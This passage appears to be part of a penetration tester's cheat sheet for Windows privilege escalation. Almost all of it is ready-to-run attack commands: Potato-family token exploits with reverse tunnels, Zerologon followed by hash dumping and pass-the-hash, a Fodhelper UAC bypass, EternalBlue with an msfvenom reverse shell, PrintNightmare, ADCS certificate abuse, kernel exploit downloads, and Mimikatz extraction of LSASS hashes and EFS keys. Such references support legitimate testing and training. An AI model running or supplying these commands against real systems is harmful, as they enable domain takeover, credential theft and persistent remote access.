-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
## CLSIDs per OS version: https://github.com/ohpe/juicy-potato/tree/master/CLSID
03.2 RoguePotato
## ------------------| Run chisel so port 9999 on our side reaches port 9999 on the victim
chisel server --reverse --port 1337                            ## On the attacker machine
.\chisel64.exe client <MyIP>:1337 R:9999:localhost:9999        ## On the victim
## ------------------| Use socat to redirect the incoming 135 into the tunnel
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999    ## On the attacker machine
## ------------------| Execute RoguePotato
.\RoguePotato.exe -r <MyIP> -e "powershell C:\Windows\Temp\rev.ps1" -l 9999
# or
.\RoguePotato.exe -r <MyIP> -e "c:\windows\temp\h4rithd.exe" -l 9999
03.3 MultiPotato
## ------------------| Download
### Bit 64
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe
### Bit 32
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe
## ------------------| BindShell with SpoolSample PipeName
.\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"
## ------------------| CreateUser with modified PetitPotam trigger
.\Multipotato.exe -t CreateUser
## ------------------| CreateProcessAsUserW with SpoolSample trigger
.\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
03.4 PrintSpoofer
# !!! The Microsoft Visual C++ Redistributable must be installed on the target
.\PrintSpoofer.exe -i -c "C:\<PATH>\shell.exe"
03.5 Zerologon (CVE-2020-1472)
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179
# If the exploit completes, the DC machine account password is now empty
impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179
# Now you can log in with the dumped hash
# '$' denotes the machine account
impacket-psexec administrator@10.10.10.179 -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0
03.6 Fodhelper UAC Bypass
## ------------------| CMD
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f
C:\Windows\System32\fodhelper.exe
## ------------------| Powershell
$program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS=="
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
## ------------------| Remove
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
03.7 Serviio Insecure File Permissions
## ------------------| Enumeration
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F)
## ------------------| Exploit
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio
## or
wmic service where caption="Serviio" get name, caption, state,startmode
whoami /priv | findstr SeShutdownPrivilege ## Disabled is fine; shutdown.exe enables it itself
shutdown /r /t 0
03.8 PrintNightmare
## ------------------| Verify vulnerability
impacket-rpcdump @<IP> | grep -A2 -B2 MS-RPRN
## ------------------| Download and execute
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare
## If you get any kind of errors like ExecutionPolicy; try with evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD> -s $(pwd)
CVE-2021-1675.ps1
menu
Invoke-Nightmare
## Then use psexec to login with new creds
impacket-psexec adm1n:'P@ssw0rd'@<IP>
03.9 EternalBlue (MS17-010)
## ------------------| Check
nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP
## ------------------| Setup
git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket pycrypto # This will get an error; that's fine
python checker.py <IP>
msfvenom -p windows/shell_reverse_tcp LHOST=<YourIP> LPORT=4545 -f exe > rev.exe
## ------------------| Method I
python send_and_execute.py <IP> rev.exe
## ------------------| Method II
## Open zzz_exploit.py file and edit following lines
service_exec(conn, r'cmd /c net user h4rithd Password123 /add')
service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add')
python zzz_exploit.py <IP>
03.10 Misconfigured Certificate Template
## --------------------| Using Certipy-Ad
sudo apt install certipy-ad
## To find vulnerable certificate templates
certipy-ad find -u <USER> -p <Password> -dc-ip <IP>
certipy-ad find -u <USER>@<DOMAIN> -p <Password> -dc-ip <IP>
## Exploit
## Certipy 2.x syntax (4.x uses -u/-p/-target/-upn as in Method II below)
certipy-ad req '<USER>@<DOMAIN>:<Password>@<IP>' -ca '<CA Name>' -template '<Template Name>' -alt 'administrator@<Domain>'
certipy-ad auth -pfx administrator.pfx -dc-ip <IP> -username Administrator -domain <Domain>
impacket-psexec administrator@<IP> -hashes <HASH>:<HASH>
## --------------------| Using Certify.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Certify/Certify.exe
./certify.exe find /vulnerable
./certify.exe request /ca:<CA Name> /template:<Template Name> /altname:Administrator
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
## --------------------| Method II
./certify.exe find /vulnerable
impacket-addcomputer <Domain>/<Username>:'<Password>!' -computer-name 'HD$' -computer-pass 'Password123!'
ntpdate -s <IP>
certipy-ad req -u 'HD$' -p 'Password123!' -ca <CA Name> -target <Domain> -template <Template Name> -upn administrator@<Domain> -dns <Domain> -dc-ip <IP>
certipy-ad cert -pfx administrator_authority.pfx -nokey -out user.crt
certipy-ad cert -pfx administrator_authority.pfx -nocert -out user.key
wget https://raw.githubusercontent.com/AlmondOffSec/PassTheCert/main/Python/passthecert.py
python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain <Domain> -dc-ip $IP
WES-NG (Windows Exploit Suggester - Next Generation)
## ------------------| Install
git clone https://github.com/bitsadmin/wesng.git
cd wesng
chmod +x wes.py
## ------------------| Download latest definitions
./wes.py --update
./wes.py -u
## ------------------| Download latest version of WES-NG
./wes.py --update-wes
## ------------------| Determine vulnerabilities
./wes.py systeminfo.txt
## ------------------| Determine vulnerabilities using both systeminfo and qfe files
./wes.py systeminfo.txt qfe.txt
## ------------------| Determine vulnerabilities and output to file
./wes.py systeminfo.txt --output vulns.csv
./wes.py systeminfo.txt -o vulns.csv
## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives
./wes.py systeminfo.txt --patches KB4345421 KB4487017
./wes.py systeminfo.txt -p KB4345421 KB4487017
## ------------------| Determine vulnerabilities, filtering out KBs published before the most recent installed KB
./wes.py systeminfo.txt --usekbdate
./wes.py systeminfo.txt -d
## ------------------| Determine vulnerabilities explicitly specifying definitions file
./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip
## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash
./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
## ------------------| Only show vulnerabilities of a certain impact
./wes.py systeminfo.txt --impact "Remote Code Execution"
./wes.py systeminfo.txt -i "Remote Code Execution"
## ------------------| Only show vulnerabilities of a certain severity
./wes.py systeminfo.txt --severity critical
./wes.py systeminfo.txt -s critical
## ------------------| Validate supersedence against Microsoft's online Update Catalog
./wes.py systeminfo.txt --muc-lookup
03.11 Windows Kernel Exploits
Download all the binary files from: https://github.com/SecWiki/windows-kernel-exploits
Microsoft Windows - Local Privilege Escalation (MS15-051)
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)
## ------------------| Information
# Date - 07th March 2017
# Discovered by - Parvez Anwar (@parvezghh)
# Vendor Homepage - http://desowin.org/usbpcap/
# Tested Version - 1.1.0.0 (USB Packet capture for Windows bundled with WireShark 2.2.5)
# Driver Version - 1.1.0.0 - USBPcap.sys
# Tested on OS - 32bit Windows 7 SP1
# Vendor fix url - not yet
# Fixed Version - 0day
# Fixed driver ver - 0day
## ------------------| Check Vulnerable Version
driverquery /v | findstr USBPcap.sys
type "C:\Program Files\USBPcap\USBPcap.inf"
## ------------------| Exploit (compile with MinGW; -o names the output, -c would only produce an object file)
curl -o exploit.c https://www.exploit-db.com/raw/41542
gcc.exe -o exploit.exe exploit.c
.\exploit.exe
Windows CLFS Driver Privilege Escalation (CVE-2023-28252)
## ------------------| Information
## Vulnerable Versions
## Windows 11 21H2, clfs.sys version 10.0.22000.1574
## Windows 10 21H2, Windows 10 22H2, Windows 11 22H2 and Windows server 2022
## ------------------| Exploit
## for all archs
wget https://github.com/duck-sec/CVE-2023-28252-Compiled-exe/raw/master/exploit.exe
## for 64 bit
wget https://github.com/duck-sec/CVE-2023-28252-Compiled-exe/raw/master/x64/Release/exploit.exe
.\exploit.exe <Token Offset> <Flag> <Program to execute>
.\exploit.exe 1208 1 calc.exe
04. Mimikatz
More commands are available in the mimikatz documentation.
Dump all users' NTLM hashes via LSASS
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out
## ------------------| If you have lsass as Mini DuMP or Rekall
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json
Set password for account
.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"
Decrypt EFS files
## ------------------| Get file's Certificate Thumbprint value
cipher /c c:\users\file.txt | Select-String "Certificate thumbprint"
## Also you can get this using following command.
dir C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name
## ------------------| Getting the certificate
.\mimikatz.exe "crypto::system /file:C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<Certificate_Thumbprint> /export" "exit"
## Download the *.der file to your machine.
## ------------------| Getting the masterkey
gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\
gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\<SID_VALUE>\
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\protect\<SID_VALUE>\<FileName> /password:<UserPassword>" "exit"
## ------------------| Decrypting the private key
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\
.\mimikatz.exe "dpapi::capi /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\<FILE> /masterkey:<SHA-1>" "exit"
## Download the *.pvk file to your machine.
## ------------------| Building & Installing the correct PFX
openssl x509 -inform DER -outform PEM -in *.der -out public.pem
openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:<NewPassword> -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
## Copy the cert.pfx file to remote machine.
certutil -user -p <NewPassword> -importpfx cert.pfx NoChain,NoRoot
## ------------------| Data access
type "c:\users\file.txt"